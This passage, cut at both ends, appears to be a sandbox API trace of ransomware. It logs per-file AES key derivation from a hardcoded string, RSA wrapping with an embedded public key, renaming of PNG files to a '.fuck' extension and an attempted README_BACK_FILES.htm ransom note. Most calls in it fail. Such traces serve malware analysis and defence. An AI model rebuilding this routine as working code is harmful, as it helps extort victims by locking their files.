(hHash=0x2817098, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.540] CryptDeriveKey (in: hProv=0x2815ee0, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28172d8) returned 1 [0236.540] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.540] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.540] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28163a8) returned 1 [0236.542] CryptImportPublicKeyInfo (in: hCryptProv=0x28163a8, dwCertEncodingType=0x1, pInfo=0x2809330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809368*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816cd8) returned 1 [0236.542] CryptEncrypt (in: hKey=0x2816cd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.542] CryptEncrypt (in: hKey=0x2816cd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815dd0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815dd0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.542] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815dd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.543] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.543] CryptEncrypt (in: hKey=0x28172d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.543] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.543] CloseHandle (hObject=0xffffffff) returned 1 [0236.543] CloseHandle (hObject=0xffffffff) returned 1 [0236.543] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), bFailIfExists=0) returned 0 [0236.543] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x0) returned 0 [0236.544] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg")) returned 0 [0236.544] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.fuck")) returned 0 [0236.544] CryptDestroyHash (hHash=0x2817098) returned 1 [0236.544] CryptDestroyKey (hKey=0x28172d8) returned 1 [0236.544] CryptReleaseContext (hProv=0x2815ee0, dwFlags=0x0) returned 1 [0236.544] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.544] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.544] GetLastError () returned 0x5 [0236.545] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0236.545] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0236.545] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.545] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.546] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg", dwFileAttributes=0x2) returned 0 [0236.546] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28165c8) returned 1 [0236.550] CryptCreateHash (in: hProv=0x28165c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.550] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.551] CryptHashData (hHash=0x2816e58, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.551] CryptDeriveKey (in: hProv=0x28165c8, Algid=0x6610, hBaseData=0x2816e58, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2816d18) returned 1 [0236.551] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.551] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.551] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816430) returned 1 [0236.552] CryptImportPublicKeyInfo (in: hCryptProv=0x2816430, dwCertEncodingType=0x1, pInfo=0x2808ff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809028*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28172d8) returned 1 [0236.552] CryptEncrypt (in: hKey=0x28172d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.552] CryptEncrypt (in: hKey=0x28172d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815ee0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815ee0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.552] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815ee0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.552] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.553] CryptEncrypt (in: hKey=0x2816d18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.553] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.553] CloseHandle (hObject=0xffffffff) returned 1 [0236.553] CloseHandle (hObject=0xffffffff) returned 1 [0236.553] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), bFailIfExists=0) returned 0 [0236.553] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x0) returned 0 [0236.553] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg")) returned 0 [0236.554] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.fuck")) returned 0 [0236.554] CryptDestroyHash (hHash=0x2816e58) returned 1 [0236.554] CryptDestroyKey (hKey=0x2816d18) returned 1 [0236.554] CryptReleaseContext (hProv=0x28165c8, dwFlags=0x0) returned 1 [0236.554] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.554] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.554] GetLastError () returned 0x5 [0236.554] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0236.555] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0236.556] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.556] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.556] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg", dwFileAttributes=0x2) returned 0 [0236.557] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28165c8) returned 1 [0236.562] CryptCreateHash (in: hProv=0x28165c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.562] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.562] CryptHashData (hHash=0x28173d8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.562] CryptDeriveKey (in: hProv=0x28165c8, Algid=0x6610, hBaseData=0x28173d8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817018) returned 1 [0236.562] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.562] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.562] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816100) returned 1 [0236.564] CryptImportPublicKeyInfo (in: hCryptProv=0x2816100, dwCertEncodingType=0x1, pInfo=0x280a510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a548*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816ed8) returned 1 [0236.564] CryptEncrypt (in: hKey=0x2816ed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.564] CryptEncrypt (in: hKey=0x2816ed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28167e8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28167e8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.564] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28167e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.564] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.564] CryptEncrypt (in: hKey=0x2817018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.564] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.564] CloseHandle (hObject=0xffffffff) returned 1 [0236.564] CloseHandle (hObject=0xffffffff) returned 1 [0236.564] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), bFailIfExists=0) returned 0 [0236.565] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x0) returned 0 [0236.565] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg")) returned 0 [0236.565] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.fuck")) returned 0 [0236.566] CryptDestroyHash (hHash=0x28173d8) returned 1 [0236.566] CryptDestroyKey (hKey=0x2817018) returned 1 [0236.566] CryptReleaseContext (hProv=0x28165c8, dwFlags=0x0) returned 1 [0236.566] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.566] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.566] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\readme_back_files.htm")) returned 0xffffffff [0236.566] AreFileApisANSI () returned 1 [0236.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0236.566] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.567] GetLastError () returned 0x5 [0236.567] GetLastError () returned 0x5 [0236.567] FindNextFileA (in: hFindFile=0x2817198, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.567] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817298 [0236.567] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.567] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.567] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.567] GetLastError () returned 0x5 [0236.567] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0236.567] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0236.568] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.568] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.568] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg", dwFileAttributes=0x2) returned 0 [0236.569] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816b18) returned 1 [0236.574] CryptCreateHash (in: hProv=0x2816b18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.574] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.574] CryptHashData (hHash=0x2817398, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.574] CryptDeriveKey (in: hProv=0x2816b18, Algid=0x6610, hBaseData=0x2817398, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28173d8) returned 1 [0236.574] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.574] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.574] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28165c8) returned 1 [0236.575] CryptImportPublicKeyInfo (in: hCryptProv=0x28165c8, dwCertEncodingType=0x1, pInfo=0x2809190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28091c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28091c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816d18) returned 1 [0236.575] CryptEncrypt (in: hKey=0x2816d18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.576] CryptEncrypt (in: hKey=0x2816d18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2816870*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2816870*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.576] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2816870, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, 